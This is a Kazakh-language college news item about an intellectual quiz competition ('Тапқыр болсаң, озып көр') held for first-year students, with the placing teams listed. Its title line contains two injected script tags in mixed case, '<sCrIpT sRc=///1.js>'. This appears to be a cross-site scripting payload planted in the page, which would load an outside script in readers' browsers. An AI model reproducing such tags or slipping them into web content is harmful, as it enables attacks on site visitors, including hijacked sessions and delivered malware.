«ТАПҚЫР БОЛСАҢ, ОЗЫП КӨР» АТТЫ ИНТЕЛЛЕКТУАЛДЫҚ САЙЫСЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.11.2024

2024 жылдың 20 қараша күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде «Парасат»  дебат клубының жетекшілігімен І курс студенттері арасында  «Ұшқыр ой алаңы» жобасы аясында «Тапқыр болсаң, озып көр» атты  интеллектуалдық сайысы өтті. Мақсат – студенттердің жан-жақты ізденісін, шығармашылық қабілеттерін шыңдау, отансүйгіштікке, елінің тарихын білуге тәрбиелеу, жан-жақты шығармашылық қабілеттерін жетілдіру, ғылыми негіздегі пәндерді игеруге қызығушылығын арттыру, шапшаңдыққа, ойын тиянақты жинақтауға дағдыландыру, бірін-бірі сыйлауға, тыңдауға үйрену. Сайысқа 4 топ қатысып, нәтижесінде «Ағылшын» бөлімінің І курс студенттерінен құралған «Speak Easy»  тобы жүлделі І орын иеленсе, «Филология» бөлімі жүлделі ІІ орынға ие болды. ІІІ орынды «Информатика» бөлімінің атынан қатысқан «Қыран» тобы алып, ІV  орынды «Бастауыш мектеп» және «Мектепке дейінгі» бөлімдерінен құралған «Білімділер» тобы иеленді.

Просмотров: 635


Пікір қосу



Деректерді қолтаңбаға қосу